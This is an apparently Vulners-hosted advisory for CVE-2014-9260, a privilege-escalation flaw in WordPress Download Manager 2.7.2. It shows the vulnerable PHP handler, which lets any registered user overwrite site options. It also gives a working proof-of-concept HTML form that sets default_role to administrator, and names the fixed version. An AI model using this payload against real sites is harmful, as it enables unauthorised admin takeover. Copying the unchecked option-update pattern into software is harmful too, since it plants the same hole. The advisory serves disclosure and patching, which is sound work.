| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
| WordPress Download Manager 2.7.2 - Privilege Escalation Vulnerability | 7 Mar 201500:00 | – | zdt | |
| WordPress download manager plugin elevation of privilege vulnerability | 8 Aug 201700:00 | – | cnvd | |
| WordPress Download Manager Plugin Privilege Escalation (CVE-2014-9260) | 6 Apr 201500:00 | – | checkpoint_advisories | |
| CVE-2014-9260 | 7 Aug 201717:00 | – | cve | |
| CVE-2014-9260 | 7 Aug 201717:00 | – | cvelist | |
| WordPress Plugin Download Manager 2.7.2 - Privilege Escalation | 24 Nov 201400:00 | – | exploitdb | |
| EUVD-2014-9085 | 7 Oct 202500:30 | – | euvd | |
| WordPress Plugin Download Manager 2.7.2 - Privilege Escalation | 24 Nov 201400:00 | – | exploitpack | |
| CVE-2014-9260 | 7 Aug 201717:29 | – | nvd | |
| WordPress Download Manager Plugin 2.7.2 - Privilege Escalation | 24 Nov 201400:00 | – | patchstack |
`# Exploit Title: WordPress Download Manager 2.7.2 Privilege Escalation
# Date: 24-11-2014
# Software Link: https://wordpress.org/plugins/download-manager/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: webapps
# CVE: CVE-2014-9260
1. Description
Every registered user can update every WordPress options using basic_settings() function.
function basic_settings()
{
if (isset($_POST['task']) && $_POST['task'] == 'wdm_save_settings') {
foreach ($_POST as $optn => $optv) {
update_option($optn, $optv);
}
if (!isset($_POST['__wpdm_login_form'])) delete_option('__wpdm_login_form');
die('Settings Saved Successfully');
}
include('settings/basic.php');
}
http://security.szurek.pl/wordpress-download-manager-272-privilege-escalation.html
2. Proof of Concept
Login as standard user (created using wp-login.php?action=register) then:
<form method="post" action="http://wordpress-url/wp-admin/admin-ajax.php?action=wdm_settings">
<input type="hidden" name="task" value="wdm_save_settings">
<input type="hidden" name="section" value="basic">
<input type="hidden" name="default_role" value="administrator">
<input type="submit" value="Hack!">
</form>
After that create new user using wp-login.php?action=register. Newly created user will have admin privileges.
3. Solution:
Update to version 2.7.3
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation